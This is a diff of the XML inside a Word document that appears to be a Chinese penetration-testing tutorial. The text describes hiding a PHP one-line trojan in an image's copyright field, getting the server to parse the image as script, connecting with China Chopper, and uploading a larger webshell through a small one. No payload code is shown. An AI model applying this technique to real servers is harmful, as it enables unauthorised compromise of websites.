+                        <a14:shadowObscured xmlns="" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -2381,24 +2378,96 @@
         </w:rPr>
         <w:t>打开菜刀连接</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>不过一般情况下直接连接上传的图片是无法拿到</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>webshell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的，需要通过漏洞和一些手段</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>来使得图片被当做</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>或者</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>来解析</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，如下，虽然可以读取目录，但是无法打开文件内容已经编辑文件，就是没有写入权限</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，访问时会弹出</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>405 method not allowed</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="4248150" cy="2038350"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="35" name="图片 35"/>
+            <wp:extent cx="2914650" cy="1962150"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="20" name="图片 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2406,23 +2475,33 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
                     <a:blip r:embed="rId37"/>
+                    <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr>
+                  <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4248150" cy="2038350"/>
+                      <a:ext cx="2914650" cy="1962150"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -2430,15 +2509,24 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="4953000" cy="2352675"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="36" name="图片 36"/>
+            <wp:extent cx="4248150" cy="2038350"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="35" name="图片 35"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2458,6 +2546,46 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="4248150" cy="2038350"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4953000" cy="2352675"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="36" name="图片 36"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId39"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="4953000" cy="2352675"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -2477,7 +2605,7 @@
       <w:pPr>
         <w:pStyle w:val="3"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -2497,7 +2625,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -2510,44 +2638,50 @@
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
         </w:rPr>
+        <w:t>图片</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>木马，上传上去是无法被解析出来，也就无法使用菜刀连</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>如下，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>将</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
         <w:t>php</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>木马图片，上传上去是无法被解析出来，也就无法使用菜刀连</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>将</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
         <w:t>一句话木马写入图片的版权当中</w:t>
       </w:r>
     </w:p>
@@ -2555,18 +2689,19 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
         <w:br w:type="page"/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
@@ -2587,7 +2722,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId39"/>
+                    <a:blip r:embed="rId40"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -2620,7 +2755,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -2646,12 +2781,13 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -2671,7 +2807,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId40"/>
+                    <a:blip r:embed="rId41"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -2724,6 +2860,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -2743,7 +2880,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId41"/>
+                    <a:blip r:embed="rId42"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -2807,12 +2944,13 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -2832,7 +2970,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId42"/>
+                    <a:blip r:embed="rId43"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -2903,12 +3041,13 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -2928,7 +3067,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId43"/>
+                    <a:blip r:embed="rId44"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3025,7 +3164,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3051,7 +3190,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId44"/>
+                    <a:blip r:embed="rId45"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3116,12 +3255,13 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -3141,7 +3281,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId45"/>
+                    <a:blip r:embed="rId46"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3195,12 +3335,13 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -3220,7 +3361,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId46"/>
+                    <a:blip r:embed="rId47"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3252,9 +3393,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3279,12 +3417,13 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -3304,7 +3443,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId47"/>
+                    <a:blip r:embed="rId48"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3371,22 +3510,19 @@
       <w:pPr>
         <w:pStyle w:val="3"/>
         <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
-        </w:rPr>
         <w:t>通过小马上传大马</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3435,7 +3571,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3461,7 +3597,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId48"/>
+                    <a:blip r:embed="rId49"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3494,7 +3630,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3521,7 +3657,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId49"/>
+                    <a:blip r:embed="rId50"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3558,7 +3694,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3578,7 +3714,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3604,7 +3740,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId50"/>
+                    <a:blip r:embed="rId51"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3655,7 +3791,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3681,7 +3817,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId51"/>
+                    <a:blip r:embed="rId52"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3750,7 +3886,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3776,7 +3912,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId52"/>
+                    <a:blip r:embed="rId53"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3813,7 +3949,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3840,7 +3976,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId53"/>
+                    <a:blip r:embed="rId54"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3877,7 +4013,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3897,7 +4033,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3923,7 +4059,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId54"/>
+                    <a:blip r:embed="rId55"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -3960,7 +4096,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3986,7 +4122,7 @@
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -4012,7 +4148,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId55"/>
+                    <a:blip r:embed="rId56"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -4042,12 +4178,12 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId56"/>
-      <w:headerReference w:type="default" r:id="rId57"/>
-      <w:footerReference w:type="even" r:id="rId58"/>
-      <w:footerReference w:type="default" r:id="rId59"/>
-      <w:headerReference w:type="first" r:id="rId60"/>
-      <w:footerReference w:type="first" r:id="rId61"/>
+      <w:headerReference w:type="even" r:id="rId57"/>
+      <w:headerReference w:type="default" r:id="rId58"/>
+      <w:footerReference w:type="even" r:id="rId59"/>
+      <w:footerReference w:type="default" r:id="rId60"/>
+      <w:headerReference w:type="first" r:id="rId61"/>
+      <w:footerReference w:type="first" r:id="rId62"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
       <w:cols w:space="425"/>
@@ -4941,7 +5077,7 @@
   <a:extraClrSchemeLst/>
   <a:extLst>
     <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
-      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" xmlns="" name="Office Theme" id="{62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}" vid="{4A3C46E8-61CC-4603-A589-7422A47A8E4A}"/>
+      <thm15:themeFamily xmlns="" xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Office Theme" id="{62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}" vid="{4A3C46E8-61CC-4603-A589-7422A47A8E4A}"/>
     </a:ext>
   </a:extLst>
 </a:theme>
